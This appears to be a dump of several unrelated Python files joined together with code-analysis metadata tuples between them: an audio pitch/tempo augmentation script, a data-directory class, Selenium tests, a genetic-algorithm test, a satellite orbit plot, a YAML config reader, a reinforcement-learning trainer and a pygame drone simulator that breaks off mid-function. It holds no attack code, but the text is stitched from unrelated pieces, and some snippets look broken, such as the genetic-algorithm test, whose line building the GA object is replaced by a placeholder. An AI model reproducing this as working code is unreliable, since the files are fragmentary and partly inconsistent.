django.contrib.humanize.templatetags.humanize import ordinal\n'), ((3088, 3098), 'django.contrib.humanize.templatetags.humanize.ordinal', 'ordinal', (['x'], {}), '(x)\n', (3095, 3098), False, 'from django.contrib.humanize.templatetags.humanize import ordinal\n')] |
"""Generate 21 pitch/tempo/gain-perturbed copies of an input WAV file.

The input file is moved to ``temp.wav`` and 21 variants named
``pp<i>-<input>`` are written, each combining a random pitch offset
(-1.0..1.0 semitones), tempo factor (0.90..1.10) and gain offset
(-5.0..5.0 dB).
"""
import sox
import numpy as np
import argparse
import os
import shutil

NUM_VARIANTS = 21

parser = argparse.ArgumentParser()
parser.add_argument("--input", help="input file name")
args = parser.parse_args()
print(args.input)

# Candidate offset values; shuffled so each variant draws a random
# (pitch, tempo, gain) combination. Each array has exactly NUM_VARIANTS
# entries. (An unused duplicate tempo array, np3, has been removed.)
pitch_offsets = np.arange(start=-1.0, stop=1.1, step=0.10)
tempo_factors = np.arange(start=0.9, stop=1.11, step=0.01)
gain_offsets = np.arange(start=-5.0, stop=5.5, step=0.5)
np.random.shuffle(pitch_offsets)
np.random.shuffle(tempo_factors)
np.random.shuffle(gain_offsets)

# Move the input aside so the generated files can reuse its name.
# shutil.move replaces os.system('mv ...'), which depended on a POSIX
# shell and broke on filenames containing spaces or shell metacharacters.
shutil.move(args.input, 'temp.wav')

for x in range(NUM_VARIANTS):
    tfm1 = sox.Transformer()
    tfm1.pitch(round(pitch_offsets[x], 1))
    tfm1.gain(round(gain_offsets[x], 1), False)
    # 's' selects the speech-optimised tempo algorithm.
    tfm1.tempo(round(tempo_factors[x], 1), 's')
    tfm1.build_file('temp.wav', 'pp' + str(x) + '-' + args.input)
| [
"sox.Transformer",
"argparse.ArgumentParser",
"os.system",
"numpy.arange",
"numpy.random.shuffle"
] | [((66, 91), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (89, 91), False, 'import argparse\n'), ((203, 244), 'numpy.arange', 'np.arange', ([], {'start': '(-1.0)', 'stop': '(1.1)', 'step': '(0.1)'}), '(start=-1.0, stop=1.1, step=0.1)\n', (212, 244), True, 'import numpy as np\n'), ((252, 294), 'numpy.arange', 'np.arange', ([], {'start': '(0.9)', 'stop': '(1.11)', 'step': '(0.01)'}), '(start=0.9, stop=1.11, step=0.01)\n', (261, 294), True, 'import numpy as np\n'), ((301, 343), 'numpy.arange', 'np.arange', ([], {'start': '(0.9)', 'stop': '(1.11)', 'step': '(0.01)'}), '(start=0.9, stop=1.11, step=0.01)\n', (310, 343), True, 'import numpy as np\n'), ((350, 391), 'numpy.arange', 'np.arange', ([], {'start': '(-5.0)', 'stop': '(5.5)', 'step': '(0.5)'}), '(start=-5.0, stop=5.5, step=0.5)\n', (359, 391), True, 'import numpy as np\n'), ((393, 415), 'numpy.random.shuffle', 'np.random.shuffle', (['np1'], {}), '(np1)\n', (410, 415), True, 'import numpy as np\n'), ((416, 438), 'numpy.random.shuffle', 'np.random.shuffle', (['np2'], {}), '(np2)\n', (433, 438), True, 'import numpy as np\n'), ((439, 461), 'numpy.random.shuffle', 'np.random.shuffle', (['np3'], {}), '(np3)\n', (456, 461), True, 'import numpy as np\n'), ((462, 484), 'numpy.random.shuffle', 'np.random.shuffle', (['np4'], {}), '(np4)\n', (479, 484), True, 'import numpy as np\n'), ((534, 552), 'os.system', 'os.system', (['command'], {}), '(command)\n', (543, 552), False, 'import os\n'), ((577, 594), 'sox.Transformer', 'sox.Transformer', ([], {}), '()\n', (592, 594), False, 'import sox\n')] |
from darr.basedatadir import BaseDataDir, create_basedatadir
from darr.metadata import MetaData
from ._version import get_versions
#TODO: required keys for sndinfo
class DataDir(BaseDataDir):
    """Disk-persistent directory holding a sound plus its metadata."""
    _classid = 'DataDir'
    _classdescr = 'object for IO for disk-persistent sounds'
    _version = get_versions()['version']
    _suffix = '.snd'
    _sndinfopath = 'sndinfo.json' # here goes required sound information
    _metadatapath = 'metadata.json' # here goes extra information

    def __init__(self, path, accessmode='r'):
        """Wrap the data directory at `path`.

        `accessmode` ('r' or 'r+') controls whether the metadata file
        may be modified; it is forwarded to the MetaData object only.
        """
        BaseDataDir.__init__(self, path)
        self._metadata = MetaData(self.path / self._metadatapath,
                                  accessmode=accessmode)

    @property
    def metadata(self):
        """Dictionary-like access to disk based metadata.

        Metadata items can be anything that can be saved in JSON format. If
        there is no metadata, the metadata file does not exist, rather than
        being empty. This saves a block of disk space (potentially 4kb)."""
        return self._metadata

    def read_sndinfo(self):
        """Return the required sound info dict read from sndinfo.json."""
        return self._read_jsondict(self._sndinfopath)

    def write_sndinfo(self, d, overwrite=False):
        """Write dict `d` to sndinfo.json (refusing to replace an existing
        file unless `overwrite` is True)."""
        self._write_jsondict(self._sndinfopath, d=d,
                             overwrite=overwrite)
        # Read back immediately; presumably this verifies the written
        # JSON round-trips -- TODO confirm intent.
        self.read_sndinfo()
def create_datadir(path, overwrite=False):
    """Create a fresh base data directory at `path` and return it wrapped
    in a DataDir object."""
    basedir = create_basedatadir(path=path, overwrite=overwrite)
    return DataDir(basedir.path)
| [
"darr.basedatadir.BaseDataDir.__init__",
"darr.basedatadir.create_basedatadir",
"darr.metadata.MetaData"
] | [((1376, 1426), 'darr.basedatadir.create_basedatadir', 'create_basedatadir', ([], {'path': 'path', 'overwrite': 'overwrite'}), '(path=path, overwrite=overwrite)\n', (1394, 1426), False, 'from darr.basedatadir import BaseDataDir, create_basedatadir\n'), ((537, 569), 'darr.basedatadir.BaseDataDir.__init__', 'BaseDataDir.__init__', (['self', 'path'], {}), '(self, path)\n', (557, 569), False, 'from darr.basedatadir import BaseDataDir, create_basedatadir\n'), ((595, 658), 'darr.metadata.MetaData', 'MetaData', (['(self.path / self._metadatapath)'], {'accessmode': 'accessmode'}), '(self.path / self._metadatapath, accessmode=accessmode)\n', (603, 658), False, 'from darr.metadata import MetaData\n')] |
###########################################################
# SELENIUM TESTS FOR PROCEDURE HARNESS
# to run: rm server_log.txt and client_log.txt from client logs directory
# launch client and server with stderr redirected to client_log.txt and server_log.txt
# run proc_harness_tests_automated.py
#
# Functionality tested:
# 1. New procedure created on server gets synched to file on client
# 2. Stable edit to any existing procedure gets synched to file on client
# 3. Unstable edit to any existing procedure DOES NOT get synched to file on client
###########################################################
import unittest
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import os
#from subprocess import Popen, PIPE
demo_time = 60
def login_helper(driver):
    """Fill in and submit the web2py login form, landing on the dashboard."""
    driver.get('http://127.0.0.1:8000/user/login')
    driver.find_element_by_id("auth_user_email").send_keys('<EMAIL>')
    pw_field = driver.find_element_by_id("auth_user_password")
    pw_field.send_keys('<PASSWORD>')
    pw_field.send_keys(Keys.ENTER)
    print('Logged in and redirected to dashboard successfully')
class ProcHarnessTest(unittest.TestCase):
    """Selenium end-to-end tests for procedure synchronisation.

    Each test drives the client's test controller, then inspects the
    client/server stderr logs and the client's procedure directory for
    the expected sync behaviour.
    """

    def setUp(self):
        self.driver = webdriver.Chrome()
        normalizedPath_c = os.path.abspath(os.getcwd() + "/../logs/client_log.txt")
        normalizedPath_s = os.path.abspath(os.getcwd() + "/../logs/server_log.txt")
        self.client_log = open(normalizedPath_c, "r")
        self.server_log = open(normalizedPath_s, "r")
        self.client_test_url = 'http://127.0.0.1:7999/test_proc_harness'
        self.proc_dir = os.path.abspath(os.getcwd() + "/../applications/client/modules/procedures")

    def test_clear_tables(self):
        """Both server and client report their tables cleared."""
        server = False
        client = False
        login_helper(self.driver)
        self.driver.get(self.client_test_url + '/clear_tables')
        # file.xreadlines() is Python 2 only and raises AttributeError on
        # Python 3; file objects iterate line-by-line directly.
        for line in self.server_log:
            if "Server Table Cleared" in line:
                server = True
        for line in self.client_log:
            if "Client Table Cleared" in line:
                client = True
        self.assertTrue(server and client)

    def test_new_proc(self):
        """A procedure created on the server is synched to a client file."""
        new_proc = False
        login_helper(self.driver)
        self.driver.get(self.client_test_url + '/new_proc_test')
        for line in self.server_log:
            if "look for proc_id and name:" in line:
                # Log line format: the procedure name is the 7th token.
                pieces = line.split()
                new_proc_name = pieces[6]
                if new_proc_name + ".py" in os.listdir(self.proc_dir):
                    new_proc = True
        self.assertTrue(new_proc)

    def test_update_proc(self):
        """A stable edit on the server is synched into the client file."""
        update_proc = False
        login_helper(self.driver)
        self.driver.get(self.client_test_url + '/update_proc_test')
        for line in self.server_log:
            if "look for proc_id, name, data" in line:
                pieces = line.split()
                proc_name = pieces[7]
                data = pieces[8]
                with open(os.path.join(self.proc_dir, proc_name + ".py")) as proc_file:
                    for proc_line in proc_file:
                        if data in proc_line:
                            update_proc = True
        self.assertTrue(update_proc)

    def test_no_update_proc(self):
        """An unstable edit on the server is NOT synched to the client."""
        no_update_proc = False
        login_helper(self.driver)
        self.driver.get(self.client_test_url + '/not_update_proc_test')
        for line in self.server_log:
            if "should not see data" in line:
                pieces = line.split()
                proc_name = pieces[10]
                data = pieces[5]
                with open(os.path.join(self.proc_dir, proc_name + ".py")) as proc_file:
                    for proc_line in proc_file:
                        if data in proc_line:
                            no_update_proc = True
        self.assertFalse(no_update_proc)

    def tearDown(self):
        self.driver.quit()
        self.client_log.close()
        self.server_log.close()
if __name__ == '__main__':
unittest.main() | [
"unittest.main",
"selenium.webdriver.Chrome",
"os.listdir",
"os.getcwd"
] | [((4242, 4257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (4255, 4257), False, 'import unittest\n'), ((1290, 1308), 'selenium.webdriver.Chrome', 'webdriver.Chrome', ([], {}), '()\n', (1306, 1308), False, 'from selenium import webdriver\n'), ((1353, 1364), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1362, 1364), False, 'import os\n'), ((1437, 1448), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1446, 1448), False, 'import os\n'), ((1701, 1712), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1710, 1712), False, 'import os\n'), ((2633, 2658), 'os.listdir', 'os.listdir', (['self.proc_dir'], {}), '(self.proc_dir)\n', (2643, 2658), False, 'import os\n')] |
""" Overall test for the PYGA framework"""
from src.ga import GA
import numpy as np
TEST_CONFIGURATION = {
"generation_size": 100,
"iterate_evolution": True,
"max_fitness": 0.99,
"display_info": False,
}
def give_score(weights) -> float:
    """Fitness function: the mean of the weights, so higher weights score higher."""
    mean_weight = np.mean(weights)
    return mean_weight
# Build a GA over 5 weights scored by give_score and apply the test config.
LOCAAL_GA_PLACEHOLDER = None  # (removed)
| [
"numpy.mean",
"src.ga.GA"
] | [((346, 393), 'src.ga.GA', 'GA', ([], {'_num_weights': '(5)', 'fitness_function': 'give_score'}), '(_num_weights=5, fitness_function=give_score)\n', (348, 393), False, 'from src.ga import GA\n'), ((316, 332), 'numpy.mean', 'np.mean', (['weights'], {}), '(weights)\n', (323, 332), True, 'import numpy as np\n'), ((487, 505), 'numpy.mean', 'np.mean', (['iteration'], {}), '(iteration)\n', (494, 505), True, 'import numpy as np\n')] |
import os
import matplotlib.pyplot as plt
from pytplot import get_data
from . import mms_load_mec
def mms_orbit_plot(trange=['2015-10-16', '2015-10-17'], probes=[1, 2, 3, 4], data_rate='srvy', xrange=None, yrange=None, plane='xy', coord='gse'):
    """Plot MMS spacecraft orbits in the requested plane.

    Parameters
    ----------
    trange : list of str
        Time range to load and plot.
    probes : list
        MMS probe numbers (1-4).
    data_rate : str
        MEC data rate, e.g. 'srvy'.
    xrange, yrange : list of float, optional
        Axis limits in Re; autoscaled when None.
    plane : str
        Plane to plot: 'xy', 'yz' or 'xz' (case-insensitive).
    coord : str
        Coordinate system: eci, gsm, geo, sm, gse or gse2000
        (case-insensitive).
    """
    # One fixed color per probe (probe number - 1 indexes this list).
    spacecraft_colors = [(0,0,0), (213/255,94/255,0), (0,158/255,115/255), (86/255,180/255,233/255)]

    # Normalize and validate the arguments *before* loading any data.
    # (Previously the varformat was built from the raw `coord` argument
    # prior to lower-casing, so e.g. coord='GSE' silently loaded nothing,
    # and invalid arguments still triggered a full data download.)
    plane = plane.lower()
    coord = coord.lower()

    if plane not in ['xy', 'yz', 'xz']:
        print('Error, invalid plane specified; valid options are: xy, yz, xz')
        return

    if coord not in ['eci', 'gsm', 'geo', 'sm', 'gse', 'gse2000']:
        print('Error, invalid coordinate system specified; valid options are: eci, gsm, geo, sm, gse, gse2000')
        return

    mec_vars = mms_load_mec(trange=trange, data_rate=data_rate, probe=probes, varformat='*_r_' + coord, time_clip=True)

    if plane == 'xy':
        plt.xlabel('X Position, Re')
        plt.ylabel('Y Position, Re')
    elif plane == 'yz':
        plt.xlabel('Y Position, Re')
        plt.ylabel('Z Position, Re')
    elif plane == 'xz':
        plt.xlabel('X Position, Re')
        plt.ylabel('Z Position, Re')

    km_in_re = 6371.2  # km per Earth radius; positions are plotted in Re

    plt.axes().set_aspect('equal')

    # Earth image spans +/- 1 Re centered on the origin.
    im = plt.imread(os.path.dirname(os.path.realpath(__file__)) + '/mec/earth_polar1.png')
    plt.imshow(im, extent=(-1, 1, -1, 1))

    plot_count = 0

    for probe in probes:
        position_data = get_data('mms' + str(probe) + '_mec_r_' + coord)
        if position_data is None:
            print('No ' + data_rate + ' MEC data found for ' + 'MMS' + str(probe))
            continue
        t, d = position_data
        plot_count += 1
        color = spacecraft_colors[int(probe)-1]
        if plane == 'xy':
            plt.plot(d[:, 0]/km_in_re, d[:, 1]/km_in_re, label='MMS' + str(probe), color=color)
        if plane == 'yz':
            plt.plot(d[:, 1]/km_in_re, d[:, 2]/km_in_re, label='MMS' + str(probe), color=color)
        if plane == 'xz':
            plt.plot(d[:, 0]/km_in_re, d[:, 2]/km_in_re, label='MMS' + str(probe), color=color)

    if plot_count > 0: # at least one plot created
        # Apply user-requested axis limits (these parameters were
        # previously accepted but ignored).
        if xrange is not None:
            plt.xlim(xrange)
        if yrange is not None:
            plt.ylim(yrange)
        plt.legend()
        plt.title(trange[0] + ' to ' + trange[1])
        plt.annotate(coord.upper() + ' coordinates', xy=(0.6, 0.05), xycoords='axes fraction')
        plt.show()
| [
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"os.path.realpath",
"matplotlib.pyplot.axes",
"matplotlib.pyplot.title",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show"
] | [((1300, 1337), 'matplotlib.pyplot.imshow', 'plt.imshow', (['im'], {'extent': '(-1, 1, -1, 1)'}), '(im, extent=(-1, 1, -1, 1))\n', (1310, 1337), True, 'import matplotlib.pyplot as plt\n'), ((883, 911), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X Position, Re"""'], {}), "('X Position, Re')\n", (893, 911), True, 'import matplotlib.pyplot as plt\n'), ((920, 948), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Y Position, Re"""'], {}), "('Y Position, Re')\n", (930, 948), True, 'import matplotlib.pyplot as plt\n'), ((2174, 2186), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (2184, 2186), True, 'import matplotlib.pyplot as plt\n'), ((2195, 2236), 'matplotlib.pyplot.title', 'plt.title', (["(trange[0] + ' to ' + trange[1])"], {}), "(trange[0] + ' to ' + trange[1])\n", (2204, 2236), True, 'import matplotlib.pyplot as plt\n'), ((2341, 2351), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2349, 2351), True, 'import matplotlib.pyplot as plt\n'), ((981, 1009), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Y Position, Re"""'], {}), "('Y Position, Re')\n", (991, 1009), True, 'import matplotlib.pyplot as plt\n'), ((1018, 1046), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Z Position, Re"""'], {}), "('Z Position, Re')\n", (1028, 1046), True, 'import matplotlib.pyplot as plt\n'), ((1173, 1183), 'matplotlib.pyplot.axes', 'plt.axes', ([], {}), '()\n', (1181, 1183), True, 'import matplotlib.pyplot as plt\n'), ((1079, 1107), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""X Position, Re"""'], {}), "('X Position, Re')\n", (1089, 1107), True, 'import matplotlib.pyplot as plt\n'), ((1116, 1144), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Z Position, Re"""'], {}), "('Z Position, Re')\n", (1126, 1144), True, 'import matplotlib.pyplot as plt\n'), ((1241, 1267), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (1257, 1267), False, 'import os\n')] |
import os
from functools import lru_cache
import yaml
from cloudshell.recorder.rest.model import RestRequest, RestSession
class Configuration(object):
    """Reads recorder settings (REST session and requests) from a YAML file."""

    SESSION_KEY = 'Session'
    RECORDS_KEY = 'Requests'

    def __init__(self, config_path):
        self._config_path = config_path
        self._config_cache = None  # lazily parsed YAML document

    @property
    def _config(self):
        """Parsed configuration dict; loaded once, then cached.

        (The previous @lru_cache on this method keyed the cache on self,
        keeping every instance alive for the cache's lifetime.)
        """
        if self._config_cache is None:
            with open(self._config_path, 'r') as config:
                # safe_load: yaml.load() without an explicit Loader is
                # deprecated since PyYAML 5.1 and a TypeError in PyYAML 6;
                # a plain config file needs no arbitrary-object tags.
                self._config_cache = yaml.safe_load(config)
        return self._config_cache

    def get_session(self):
        """Build a RestSession from the 'Session' section."""
        return RestSession(**self._config.get(self.SESSION_KEY))

    def get_requests(self):
        """Build the list of RestRequest objects from the 'Requests' section."""
        return [RestRequest(**record_args)
                for record_args in self._config.get(self.RECORDS_KEY)]
| [
"functools.lru_cache",
"yaml.load",
"cloudshell.recorder.rest.model.RestRequest"
] | [((310, 321), 'functools.lru_cache', 'lru_cache', ([], {}), '()\n', (319, 321), False, 'from functools import lru_cache\n'), ((417, 434), 'yaml.load', 'yaml.load', (['config'], {}), '(config)\n', (426, 434), False, 'import yaml\n'), ((664, 690), 'cloudshell.recorder.rest.model.RestRequest', 'RestRequest', ([], {}), '(**record_args)\n', (675, 690), False, 'from cloudshell.recorder.rest.model import RestRequest, RestSession\n')] |
import numpy
import torch
from torch_rl.algos.base import BaseAlgo
class I2Algorithm(BaseAlgo):
    """Actor-critic training algorithm with an auxiliary imagination-policy
    distillation step.  Experience collection is inherited from BaseAlgo;
    this class owns the loss computation and the two optimizers.
    """
    def __init__(self, environment_class, n_processes=16, seed=1, acmodel=None, num_frames_per_proc=None, discount=0.99,
                 lr=7e-4, gae_lambda=0.95, entropy_coef=0.01, value_loss_coef=0.5, max_grad_norm=0.5, recurrence=1,
                 rmsprop_alpha=0.99, rmsprop_eps=1e-5, preprocess_obss=None, reshape_reward=None):
        # Default to 8 frames per process when the caller gives None.
        num_frames_per_proc = num_frames_per_proc or 8
        super().__init__(environment_class, acmodel, num_frames_per_proc, discount, lr, gae_lambda, entropy_coef,
                         value_loss_coef, max_grad_norm, recurrence, preprocess_obss, reshape_reward, n_processes, seed)
        # self.optimizer = torch.optim.RMSprop(self.acmodel.parameters(), lr, alpha=rmsprop_alpha, eps=rmsprop_eps)
        # Optimizers are created lazily in load_acmodel(); update_parameters()
        # must not be called before a model has been loaded.
        self.agent_optimizer = None
        self.imagination_policy_optimizer = None
    def load_acmodel(self, acmodel):
        """Attach a model and (re)build both optimizers for its parameters.

        NOTE(review): rmsprop_alpha/rmsprop_eps from __init__ are not used
        here; the values 0.99 / 1e-5 are hard-coded -- confirm intended.
        """
        super().load_acmodel(acmodel)
        self.agent_optimizer = torch.optim.RMSprop(self.acmodel.parameters(), self.lr, alpha=0.99, eps=1e-5)
        self.imagination_policy_optimizer = torch.optim.Adam(self.acmodel.imagination_policy.parameters(), lr=self.lr)
    def update_parameters(self):
        """Run one A2C-style update plus an imagination-policy distillation
        step, and return a dict of logging values."""
        # Collect experiences
        exps, logs = self.collect_experiences()
        # Initialize update values
        update_entropy = 0
        update_value = 0
        update_policy_loss = 0
        update_value_loss = 0
        update_loss = 0
        # Compute loss
        dist, value = self.acmodel(exps.obs)
        entropy = dist.entropy().mean()
        policy_loss = -(dist.log_prob(exps.action) * exps.advantage).mean()
        value_loss = (value - exps.returnn).pow(2).mean()
        loss = policy_loss - self.entropy_coef * entropy + self.value_loss_coef * value_loss
        # Update batch values
        update_entropy += entropy.item()
        update_value += value.mean().item()
        update_policy_loss += policy_loss.item()
        update_value_loss += value_loss.item()
        update_loss += loss
        # Update update values
        # NOTE(review): the batch values above are accumulated exactly once,
        # so dividing by self.recurrence only matches the intended average
        # when recurrence == 1 -- confirm for recurrent configurations.
        update_entropy /= self.recurrence
        update_value /= self.recurrence
        update_policy_loss /= self.recurrence
        update_value_loss /= self.recurrence
        update_loss /= self.recurrence
        # Update actor-critic
        self.agent_optimizer.zero_grad()
        update_loss.backward()
        # Gradient norm is measured before clipping, so the log reflects the
        # raw gradient magnitude.
        update_grad_norm = sum(p.grad.data.norm(2) ** 2 for p in self.acmodel.parameters()) ** 0.5
        torch.nn.utils.clip_grad_norm_(self.acmodel.parameters(), self.max_grad_norm)
        self.agent_optimizer.step()
        # Distill the (detached) actor distribution into the imagination
        # policy via a cross-entropy loss.
        self.imagination_policy_optimizer.zero_grad()
        distilled_distributions, _, _ = self.acmodel.imagination_policy(exps.obs, None)
        distillation_loss = (-1 * distilled_distributions.logits * dist.probs.detach()).sum(dim=1).mean()
        distillation_loss.backward()
        self.imagination_policy_optimizer.step()
        # Log some values
        logs["entropy"] = update_entropy
        logs["value"] = update_value
        logs["policy_loss"] = update_policy_loss
        logs["value_loss"] = update_value_loss
        logs["grad_norm"] = update_grad_norm
        logs["distillation_loss"] = distillation_loss.item()
        return logs
    def _get_starting_indexes(self):
        """Gives the indexes of the observations given to the model and the
        experiences used to compute the loss at first.
        The indexes are the integers from 0 to `self.num_frames` with a step of
        `self.recurrence`. If the model is not recurrent, they are all the
        integers from 0 to `self.num_frames`.
        Returns
        -------
        starting_indexes : list of int
            the indexes of the experiences to be used at first
        """
        starting_indexes = numpy.arange(0, self.num_frames, self.recurrence)
        return starting_indexes
| [
"numpy.arange"
] | [((3872, 3921), 'numpy.arange', 'numpy.arange', (['(0)', 'self.num_frames', 'self.recurrence'], {}), '(0, self.num_frames, self.recurrence)\n', (3884, 3921), False, 'import numpy\n')] |
import pygame
from pygame.locals import *
from sys import exit
from PIL import Image
from PID import execute_PID
import numpy as np
# Global Variables
larg = 1000.0  # screen width in pixels (float; pygame/PIL calls may need ints)
alt = 640.0  # screen height in pixels
# NOTE(review): a `global` statement at module level is a no-op; the
# declarations that matter are the ones inside the functions that assign
# these names (Drone_Control.pid_control, Game.run).
global position_, angle_, velocidade
position_ = 0  # last drone position shown in the HUD (set in pid_control)
angle_ = 0  # last drone angle in degrees shown in the HUD
velocidade = 0  # last drone velocity shown in the HUD
class Screen:
    """pygame window wrapper: owns the display surface and draws the
    background image and the textual HUD (destination, position, velocity,
    angle), which reads the module-level status globals."""

    def __init__(self, larg, alt, bg_image):
        pygame.init()
        # Set window's name
        pygame.display.set_caption("Simulador 2D de Drone")
        # Path of the original background; the display uses the pre-resized
        # copy written by resize_screen_image().
        self.bg_image = bg_image
        self.background = pygame.image.load('Imagens/Imagem_fundo_resized.jpg')
        # Window's size
        self.larg = larg
        self.alt = alt
        # NOTE(review): larg/alt are floats at module level; newer pygame
        # versions require int dimensions here -- confirm on the target
        # pygame version.
        self.screen = pygame.display.set_mode((self.larg, self.alt))

    def resize_screen_image(self):
        """Resize the background image to the screen size and save the
        working copy used by __init__.

        Fixes: previously this read the module-level global ``bg_image``
        instead of the path stored on the instance, and it passed float
        dimensions to PIL, which ``Image.resize`` rejects.
        """
        image = Image.open(self.bg_image)
        image = image.resize((int(self.larg), int(self.alt)))
        image.save('Imagens/Imagem_fundo_resized.jpg')

    def plot(self, x, y):
        """Blit surface ``x`` at position ``y`` onto the screen."""
        self.screen.blit(x, y)

    def update_screen(self):
        """Redraw the background and the HUD text for the current frame."""
        # Screen configuration
        self.screen.fill((0, 0, 0))  # Clean the last screen to update the frames
        self.screen.blit(self.background, (0, 0))  # Load the bg at the (0, 0) position of the screen
        # Fonte
        fonte = pygame.font.SysFont('arial', 15, True, True)
        # Destino
        texto = f'Destino do drone: ({mx_real:.2f}, {my_real:.2f})'
        texto_formatado = fonte.render(texto, True, (255, 255, 255))
        self.screen.blit(texto_formatado, (10, 10))
        # Posição Atual
        texto = f'Posição atual: ({position_})'
        texto_formatado = fonte.render(texto, True, (255, 255, 255))
        self.screen.blit(texto_formatado, (10, 30))
        # Velocidade Atual
        texto = f'Velocidade atual: ({velocidade})'
        texto_formatado = fonte.render(texto, True, (255, 255, 255))
        self.screen.blit(texto_formatado, (10, 50))
        # Angulo Atual
        texto = f'Ângulo: {angle_:.2f}'
        texto_formatado = fonte.render(texto, True, (255, 255, 255))
        self.screen.blit(texto_formatado, (10, 70))
class Drone:
    """Drone sprite: loads the (pre-resized) image and draws it rotated
    about its own center each frame."""

    def __init__(self, position, angle, vel, drone_image):
        # Drone's position, angle and velocity
        self.position = position
        self.posH = self.position[0]
        self.posV = self.position[1]
        self.angle = angle
        self.vel = vel
        # Load drone image
        self.drone_image = drone_image
        self.drone = pygame.image.load('Imagens/drone_resized.png')
        self.tamX = self.drone.get_size()[0]
        # Fix: the vertical size previously copied get_size()[0] (the width);
        # index 1 is the height.
        self.tamY = self.drone.get_size()[1]
        # Tuple placeholder; drone_rotate() replaces it with the half-height
        # scalar used for centering.
        self.height = 0, 0
        # Get screen class
        self.screen = Screen(larg, alt, None)
        self.drone_rotated = self.drone
        self.drone_rotated_pos = self.position

    def resize_drone_image(self):
        """Resize the drone image to 100x50 and save the working copy.

        Fix: read the path stored on the instance instead of the
        module-level ``drone_image`` global.
        """
        image = Image.open(self.drone_image)
        image = image.resize((100, 50))
        image.save('Imagens/drone_resized.png')

    def drone_rotate(self, position, angle):
        """Rotate the sprite and recompute the top-left blit position so the
        rotation appears centered on ``position``."""
        self.drone_rotated = pygame.transform.rotate(self.drone, angle)
        # correcting drone's rotated position to the center of the drone's image
        self.height = self.drone_rotated.get_height() / 2
        self.drone_rotated_pos = (position[0] - self.drone_rotated.get_width() / 2, position[1] - self.height)

    def drone_update(self, position, angle):
        """Rotate and draw the drone for the current frame."""
        self.drone_rotate(position, angle)
        # spawn drone
        self.screen.plot(self.drone_rotated, self.drone_rotated_pos)
class Drone_Control:
    """Glue between user input, the PID controller and the Drone sprite.

    Screen coordinates have the origin at the top-left with y growing
    downward; "real" coordinates put the origin at the bottom-center of
    the window (offset 100 px from the bottom) with y growing upward.
    """
    def __init__(self, drone_image):
        # Movement, position and rotation parameters
        self.position = [500, 540]
        self.posH = self.position[0]
        self.posV = self.position[1]
        self.vel = 10
        self.angle = 0
        self.drone = Drone(self.position, self.angle, self.vel, drone_image)
        self.drone_rotated = self.drone.drone_rotated
        # Screen to Real coordinates
        self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
        # Screen limits (The screen size minus the player size)
        self.xlim = larg - self.drone.tamX / 2
        self.ylim = alt - self.drone.tamY / 2
        self.keys = 0
        # Initializing control parameters
        # State vector layout (inferred from pid_control's unpacking):
        # [w1, w2, x, y, v1, v2, angle(rad), angular velocity(rad)]
        self.w1 = 0
        self.w2 = 0
        self.v1 = 0
        self.v2 = 0
        self.ang_vel = 0
        self.x = np.array([self.w1, self.w2,
                           self.real_pos['x'], self.real_pos['y'],
                           self.v1, self.v2,
                           self.angle * np.pi / 180.,
                           self.ang_vel * np.pi / 180.])
        self.eP = np.array([1, 1])  # Position error
        self.ePhi = 2  # angle error
    def key_control(self):
        """Translate arrow/WASD keys into a setpoint 100 real-units away and
        feed it to the PID controller."""
        self.keys = pygame.key.get_pressed()
        self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
        destiny_x, destiny_y = self.real_pos['x'], self.real_pos['y']
        if self.keys[pygame.K_LEFT] or self.keys[pygame.K_a]:
            destiny_x = self.real_pos['x'] - 100.0
        if self.keys[pygame.K_RIGHT] or self.keys[pygame.K_d]:
            destiny_x = self.real_pos['x'] + 100.0
        if self.keys[pygame.K_UP] or self.keys[pygame.K_w]:
            destiny_y = self.real_pos['y'] + 100.0
        if self.keys[pygame.K_DOWN] or self.keys[pygame.K_s]:
            destiny_y = self.real_pos['y'] - 100.0
        self.pid_control(destiny_x, destiny_y)
    def mouse_control(self, destiny_x, destiny_y):
        """Steer toward a mouse-click destination (real coordinates).
        Returns pid_control's flag: True while still moving."""
        return self.pid_control(destiny_x, destiny_y)
    def pid_control(self, destiny_x, destiny_y):
        """Advance the PID one step toward (destiny_x, destiny_y).

        Returns True while the position/angle error is above tolerance
        (still converging), False once the setpoint is reached.  Relies on
        the module-global timestep ``t`` set each frame by Game.run().
        """
        self.real_pos = {'x': -(larg / 2 - self.posH), 'y': alt - 100 - self.posV}
        self.eP = np.array([destiny_x - self.real_pos['x'], destiny_y - self.real_pos['y']])
        if np.abs(self.eP[0]) > 0.2 or np.abs(self.eP[1]) > 0.2 or np.abs(self.ePhi) > 0.1:
            self.x, self.eP, self.ePhi = execute_PID(self.x, [destiny_x, destiny_y], t)
            # Converting from real coordinate to screen coordinate
            self.posH, self.posV = self.x[2] + larg / 2, alt - 100 - self.x[3]
            # Updating state vector
            self.angle = self.x[6]*180/np.pi
            self.v1, self.v2 = self.x[4], self.x[5]
            self.w1, self.w2 = self.x[0], self.x[1]
            self.ang_vel = self.x[7]
            # Updating drone's pixel position and angle
            self.position = [self.posH, self.posV]
            self.drone.drone_update(self.position, self.angle)
            ################ Printing drone's status
            # Publish status to the module globals read by Screen's HUD.
            global position_, angle_, velocidade
            position_ = (round(self.x[2], 2), round(self.x[3], 2))
            angle_ = self.angle
            velocidade = (round(self.v1, 2), round(self.v2, 2))
            return True
        else:
            # Within tolerance: hold position and just redraw the sprite.
